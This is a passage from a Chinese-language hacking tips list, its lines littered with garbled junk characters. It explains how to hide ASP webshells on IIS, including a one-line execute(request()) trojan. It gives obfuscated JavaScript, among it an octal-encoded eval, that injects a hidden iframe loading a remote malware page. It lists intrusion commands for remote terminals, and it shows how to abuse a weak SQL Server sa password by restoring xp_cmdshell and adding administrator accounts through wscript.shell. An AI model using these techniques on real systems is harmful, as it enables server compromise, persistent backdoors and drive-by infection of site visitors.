1 t: Z) c$ y, u0 p) i: {用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
7 R* O2 \' a+ |' O7 u [6 E: n6 Q4 H, C2 N
53、隐藏ASP后门的两种方法# u6 @) L7 K( j& X" W# U5 S
1、建立非标准目录:mkdir images..\9 Z& B1 U0 J: w4 P* F- w3 B
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
g% d; n! S9 L3 N! j通过web访问ASP木马:http://ip/images../news.asp?action=login
% U! k* s% z. O) \; o如何删除非标准目录:rmdir images..\ /s
1 o5 I- i2 c- R! K2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
( |2 e z) N) }' U( Y: mmkdir programme.asp2 m" I, g& s. T
新建1.txt文件内容:<!--#include file=”12.jpg”-->; l+ i# |( ~( ~
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件) K) j4 J' u! ?7 ~
attrib +H +S programme.asp; ?& |% O) H3 |
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
5 `$ M- k/ V- F: B1 a h; G( [+ C/ O0 B2 f' ]$ \
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。/ a* ]$ Q* K; m3 X5 g7 D B9 }9 ~
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
( l4 n! S; c" O1 s+ f
; d& I O3 A/ L3 p( Y( g% n1 M2 u55、JS隐蔽挂马. Q) H8 t) j7 u
1.# W& r6 {7 y! o8 O, B/ M: G
var tr4c3="<iframe src=ht";
# S5 {6 H* O# P5 \- M$ r' J( V8 D' Ctr4c3 = tr4c3+"tp:/";" R1 J7 A! K. r; j" O& B* F1 {
tr4c3 = tr4c3+"/ww";1 }8 c5 ^( l* c- D7 r
tr4c3 = tr4c3+"w.tr4";- Q- q$ j$ w8 p! I; L3 b1 |3 F+ V
tr4c3 = tr4c3+"c3.com/inc/m";
" u- |5 [, c7 A% Rtr4c3 = tr4c3+"m.htm style="display:none"></i";
0 e# V7 M ?3 w1 p. Y1 t h, N: mtr4c3 =tr4c3+"frame>'";! T2 _9 ]. Y0 S
document.write(tr4c3);
, F2 z% p( d) |. z) z1 n: d避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。- ]2 z1 n7 z5 E6 ~: @( B S
& r. O; Q9 B, [# {% I6 o' t
2., q" n) U- @" A: ~
转换进制,然后用EVAL执行。如0 e/ q% o4 `+ q8 J% G6 o! n; P b
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");0 W! b! K2 z" K2 H+ z$ n7 r
不过这个有点显眼。$ U( B2 M1 v& @. Y& [- L0 R
3.5 s7 ~8 {8 I6 q3 c$ g o
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');. l1 r. `9 T2 \; H2 v* b
最后一点,别忘了把文件的时间也修改下。
8 Q% f! y3 E# ~! `/ ~; o3 p' c' U% M ]% Y7 ]$ [
56.3389终端入侵常用DOS命令$ v \9 ]4 D; T @ ~
taskkill taskkill /PID 1248 /t
. O$ F6 ^9 O$ P
( ~% G. {9 J- C# q3 U$ _8 S. h$ _- ttasklist 查进程
% N+ L, ~# R# Q6 A: ]5 i7 K' C: G+ m( h* [$ I
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限4 S, M7 X; U$ ~) Z2 u# Y
iisreset /reboot
" i* i; v" a J$ Ltsshutdn /reboot /delay:1 重起服务器5 v. V0 N" g+ z# ]2 d9 v
* Y" T% V: Q/ |* l; nlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 A$ ?: e8 L* T3 I) t! F
9 q5 @/ y7 b8 M$ s+ ~query user 查看当前终端用户在线情况9 A8 C; m9 I) l& u6 M
2 ?$ G2 Z! e! e, p: d
要显示有关所有会话使用的进程的信息,请键入:query process *
' s; L5 ^8 J* ?. k0 K+ l: V3 w. u3 |( u* u/ b
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
& h* T d8 k9 C: {) R; F ~6 z _8 Q6 |; q! G
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER23 S' H8 q; \' I8 |
. H/ G0 W; Y9 o+ h1 Q7 x6 X2 _要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
. v& B! |4 X/ Z/ T: v( z0 y( D7 q
7 a; z* d0 d a# J' H, ]! B命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启( E$ _ r6 C( P
( S. K# G1 V7 M
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统/ W/ i) e8 v7 v0 I
, b& Q" X2 v2 w9 v
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。& ~( e! Z9 P3 S/ z, A1 k5 `; ^
1 K: f6 z+ q+ Y8 H' p3 g
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机1 i+ |. c1 t0 C
N+ c, U0 J Y0 L( h ~. ?* Q* @
56、在地址栏或按Ctrl+O,输入:, ~: k) s8 h) F. V# t# B6 r
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
* `( [2 H9 C& H* `. G
- N+ O+ M5 m# E# m% e% S' ?源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。$ E( G1 Y' F% i. Z
/ I+ Z% f& V. w( p6 z, e57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
# t" |' L) r0 S$ {7 s用net localgroup administrators是可以看到管理组下,加了$的用户的。
P$ a* l7 E+ {, v, P& E$ X) y! P2 ?: i; l$ E* t
58、 sa弱口令相关命令
/ x: B3 R4 [1 v0 u
5 p& {2 O" q6 H% g% r% q一.更改sa口令方法:1 l8 H+ {+ e2 \- l, Z2 q, o
用sql综合利用工具连接后,执行命令:& U2 X* \/ M3 Q
exec sp_password NULL,'20001001','sa'
+ G6 ] \$ V. k. [. }0 {(提示:慎用!)2 Y1 h! G+ I- ~$ w) J/ E
& @8 f" G! f2 s$ J5 I5 I, f0 K, a% }
二.简单修补sa弱口令.
' H; s: W, X, O7 B) y# G
2 _5 P' Z T6 {; {) _/ {方法1:查询分离器连接后执行:
! F9 P5 w9 U/ D4 C# d: j8 `if exists (select * from
+ _6 a' L9 [& l8 x# C8 mdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
) {4 x# v+ ` ~+ c g- xOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
' V1 [% L8 h5 E' o4 r# x* T
6 o& c6 P" y& H _$ [2 G4 e7 Texec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% R' Z9 b+ o5 ]8 g/ G
, W8 d: ?% ^0 UGO/ x' ]4 V1 k" [; v9 d0 j
! \2 B0 S$ c6 f9 F: W" F然后按F5键命令执行完毕
; b1 v" ^+ F0 |8 ~9 A0 `0 u+ @
" E) i9 [/ p5 @方法2:查询分离器连接后& \2 {/ C3 ?; N+ q' W% P, q( b
第一步执行:use master
2 R F7 L3 ^# D( u! r+ N. _第二步执行:sp_dropextendedproc 'xp_cmdshell'
8 p! q l& o: F( g( j! d; o然后按F5键命令执行完毕
1 v7 F- i) i6 Q8 L& ]$ ?* j5 l# P- G( @1 x0 [
2 F4 K. F$ A2 u( C5 O. f% p/ K三.常见情况恢复执行xp_cmdshell.
# i1 }: u! J9 a
: ~6 i3 N/ I% |: J. F u' d
& u8 W* d" P2 Z: g1 未能找到存储过程'master..xpcmdshell'.
+ v5 i4 l3 }) c. E6 _0 | 恢复方法:查询分离器连接后,0 W. o6 l. i6 w. h
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
. X L% ?# y" a1 r第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 N r, W( o3 d% E
然后按F5键命令执行完毕0 d9 R% M- J0 o" R1 S' S
/ @3 { _1 b2 b2 v: ^ y/ g+ J2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。): G5 c# r1 ~: k, B7 i
恢复方法:查询分离器连接后,
/ e8 d3 _# T$ T2 i2 x第一步执行:sp_dropextendedproc "xp_cmdshell": _' p% ?, y- h6 v- Y: o$ B
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'3 R( R. P" x. ~
然后按F5键命令执行完毕) i3 h7 R4 ?9 O9 W b H
$ u2 |1 \+ u( O1 t; E6 I3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
! Q" ^. W1 k8 z$ B恢复方法:查询分离器连接后,( W& r' ?; t3 r5 f* n! }
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 t$ w! d& @' I( [+ J5 Y$ m( e$ n第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
( \' @8 d2 Y z% y然后按F5键命令执行完毕
$ ^" W& L" D. A: n
3 h& G l0 I$ L) K/ `( J& n四.终极方法.& `, c$ f5 h6 ?. s7 c
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
7 q5 d# i. s2 R2 O- w查询分离器连接后,
7 V5 [- R: x/ p; H- R& c2000servser系统:3 Z" K3 Z! f, w& f2 o
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
5 ], F' m; Z& N8 P
( Z& p- c: r- I8 a5 N8 r3 [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
0 I& H; y( T# L8 F, {, U
8 ~" z5 ^* e" {# A' zxp或2003server系统:
" n$ q; X' Z- _5 Z3 H
5 ]$ [2 y' x3 j- _" Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'! v4 }% x% G/ W/ d$ k& i$ \/ I, P
1 g& q5 e; p/ v5 T; a6 ~2 p/ ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 i* J9 U3 A- L( |& n$ x4 W8 J- T
|